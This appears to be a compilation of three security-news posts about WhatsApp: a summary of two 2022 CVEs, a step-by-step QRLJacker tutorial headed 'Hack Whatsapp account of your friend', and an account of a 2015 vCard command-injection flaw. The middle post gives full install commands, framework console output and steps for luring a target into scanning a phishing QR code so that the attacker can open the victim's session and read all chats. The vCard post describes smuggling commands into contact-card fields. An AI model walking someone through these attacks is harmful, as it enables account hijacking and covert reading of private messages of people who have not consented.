CVE-2022-36934, which has a severe severity rating (CVSS score of 9.8), affects all Android and iOS versions previous to v2.22.16.12, Business for Android prior to v2.22.16.12, and Business for iOS prior to v2.22.16.12. Integer overflow is the root cause of this issue. Unknown code in the component Video Call Handler is vulnerable to this vulnerability. Overflow of a heap-based buffer results from the modification. Declaring the issue with CWE results in CWE-122. On 09/23/2022, the vulnerability was disclosed. Downloads of the advice are available at whatsapp.com. The CVE number for this issue is 2022-36934. Remote activation of the attack is possible. Technical information is not available.

Another flaw, identified as CVE-2022-27492, is an integer underflow that affects WhatsApp versions prior to 2.22.16.2 for Android and 2.22.15.9 for iOS. An attacker might take advantage of this weakness to run arbitrary code on the system by sending the system a specially crafted video file. This issue affects some unknown processing of the component Video File Handler. The manipulation leads to integer underflow. The CWE definition for the vulnerability is CWE-191. The weakness was disclosed 09/23/2022. The advisory is shared at whatsapp.com. The identification of this vulnerability is CVE-2022-27492. The attack may be initiated remotely. There are no technical details available. 

It is advised that WhatsApp users update to the most recent version to reduce the risk posed by the CVE-2022-36934 and CVE-2022-27492 issues. According to the business, there is no evidence that any of the vulnerabilities fixed in this version have been used maliciously.

The post Two critical WhatsApp vulnerabilities allow hacking WhatsApp (Android & iOS) via call or video file. Update immediately appeared first on Information Security Newspaper | Hacking News.

Social Engineering attacks still works. Most of the attackers do use social engineering methods to trick targets. According to ethical hacking researcher of international institute of cyber security social engineering methods are used in QRLJacker, a tool that is used in obtaining whats app web sessions. The whole program is written in python. This tool works on principle of phishing. Phishing is a type of social engineering attack in which fake login pages or payment pages are generated to gather credentials of users.

QRLJacker is most common tool used in whatsapp session hijacking which can be helpful in initial phase of pentesting.

• For testing we have used Live Kali Linux 2019.4 amd64. While testing QrlJacker sometimes, QRLJacker was not working on installed versions of Kali linux. We have tested onLive boot of Kali Linux 2018.4, 2018.3 & 2019.1 amd64.
• Geeko driver act as web browser engine used in applications developed by Mozilla. It creates an link between Selenium (an python module) & Mozilla browser. For installing type wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz
• Type tar -xvzf geckodriver-v0.24.0-linux64.tar.gz and change directory to extracted one.
• Type sudo mv -f geckodriver /usr/local/share/geckodriver
• Type sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
• Type sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
• Remember to update firefox browser. For that type sudo apt-get update & sudo apt-get install firefox-esr
• Type apt-get install python3.7
• Type git clone https://github.com/OWASP/QRLJacking
• Type python3.7 -m pip install -r requirements.txt
• Type python3.7 QrlJacker.py

_____________________________________
!\/        !        \/         ./
!/\        !        |\       ./
!  \       !       /  \    ./
!   \______!______|    \ ,/
!   /\     !    ./\    ,/
! /   \    !    |  \ ,/
!/     \___!____|  ,/   Everything is connected, even the simplest things!
!     / \ _!__ *\,/
!    !   \ !  \,/
!    !  | \! ,/
!----------K/
!    ! ,!  /|     QrlJacker-Framework By @D4Vinci - V2.1
!    !/   / |      Attack vector By Mohamed Abdelbasset Elnouby (@SymbianSyMoh)
!   / \  /  |          Loaded 1 grabber(s), 0 post module(s).
!\./   \/   |
!/\    /    |
!  \  /    .o.
!   \/     :O:
!   /       "
!  /
! /
!/
!
!
!

• Type help

QrlJacker > help

General commands
=================
        Command               Description
        ---------             -------------
        help/?                Show this help menu.
        os      <command>     Execute a system command without closing the framework
        banner                Display banner.
        exit/quit             Exit the framework.

Core commands
=============
        Command               Description
        ---------             -------------
        database              Prints the core version, check if framework is up-to-date and update if you are not up-to-date.
        debug                 Drop into debug mode or disable it. (Making identifying problems easier)
        dev                   Drop into development mode or disable it. (Reload modules every use)
        verbose               Drop into verbose mode or disable it. (Make framework displays more details)
        reload/refresh        Reload the modules database.

• Type list & type use grabber/whatsapp

 QrlJacker > list
 Name              Description
  grabber/whatsapp  Whatsapp QR-sessions grabber and controller
 QrlJacker > use grabber/whatsapp 

• Type options & type set port 1337
• Type set host 192.168.1.7

 QrlJacker Module(grabber/whatsapp) > set port 1337
 [+] port => 1337
 QrlJacker Module(grabber/whatsapp) > set host 192.168.1.7
 [+] host => 192.168.1.7 
QrlJacker Module(grabber/whatsapp) > options
 Name       Current value  Required  Description
  port       1337             Yes       The local port to listen on.
  host       192.168.1.7        Yes       The local host to listen on.
  useragent  (default)      Yes       Make useragent is the (default) one, a (random) generated useragent or a specifed useragent 

Type run, you can also run this on port 80 rather than 1337, to look it like a real page of whatsapp

 QrlJacker Module(grabber/whatsapp) > run  

QrlJacker Module(grabber/whatsapp) > run
 [+] Using the default useragent
 [+] Running a thread to keep the QR image  [whatsapp]
 [+] Waiting for sessions on whatsapp
 [+] Running a thread to detect Idle once it happens then click the QR reload button [whatsapp]
 [+] Initializing webserver… [whatsapp]

• After starting Qrljacker server. You can send this link to your target. For testing we have opened generated QrlJacker Code on Windows 7. Type 192.168.1.7:1337

• For usage we have opened on whatsapp 2.19.98. Scan the QR code in Whatsapp web of your mobile or ask your friend to login in whatsapp web using social engineering techniques

• Go to terminal where you have started QrlJacker on Kali. Type sessions Sessions will shows connected Whats app accounts to QrlJacker sessions.

QrlJacker Module(grabber/whatsapp) > sessions
 ID  Module name  Captured on              
  0   whatsapp     Sat-Apr-13-04:53:03-2019 

• As you type sessions -i 0, Kali Linux web browser will open with target Whatsapp account First it will open web.whatsapp.com.

• But after 1 or 2 seconds target Whatsapp account will open.

• Now you can see all the chat of whatsapp.

Practical Video on QrlJacking :-

Above video is posted by a ethical hacking student of International Institute of Cyber Security, Delhi India. In Next publish we will analyse how QRLJacker works

The post Hack Whatsapp account of your friend appeared first on Information Security Newspaper | Hacking News.

Exploiting a flaw in the system of sending vCard, the attacker can easily execute arbitrary code remotely and potentially acquire full contol of the target system. The vulnerability has already been corrected, but the service has been exposed since its debut to possible hack remotely.

WhatsApp Bug 2015 Web is performed by web browsers and could be violated simply by sending a vCard suitably manipulated to contain malicious code. If the vCard had been opened on the web-app the attacker could execute code contained on the system in use by the victim. WhatsApp spy Web could be used to convey many types of malware, such as ransomware, bots and even remote access tools (RATs).

Carry out the attack was simple: “To exploit the exploit, everything he needed the aggressor is a telephone number associated with the account,” says Check Point. WhatsApp allows you to send and receive several kinds of files: photos, videos, voice messages and also share your location and contact cards. Unlike e-mail attachments, which we approach with making more cautious, the user opens WhatsApp usually shared files “without thinking twice,” says the company.

The vulnerability is caused by an inadequate filtering of contact cards sent with the famous vCard format. The attacker can inject a command file attributes vCard separated by “&”. When the vCard is opened, Windows tries to run all the lines of code present, including those injected. By clicking on the contact card manipulated the system downloads a file on the PC that runs automatically on your computer, said CheckPoint, specifying that the file could also be an executable.

WhatsApp, in fact, did not provide a check on the vCard format or content of the file, allowing an attacker to exploit the vulnerability by sending naive even .exe file. The Israeli company announced the existence of the flaw on 27 August, and the company of Jan Koum responded in a prompt warning: “WhatsApp has verified and confirmed the security issue and has developed a fix for the client web around the world, “he writes Check Point.

Source:https://www.desispy.com/

The post Whatsapp Hack that Allows User to Steal Conversation appeared first on Information Security Newspaper | Hacking News.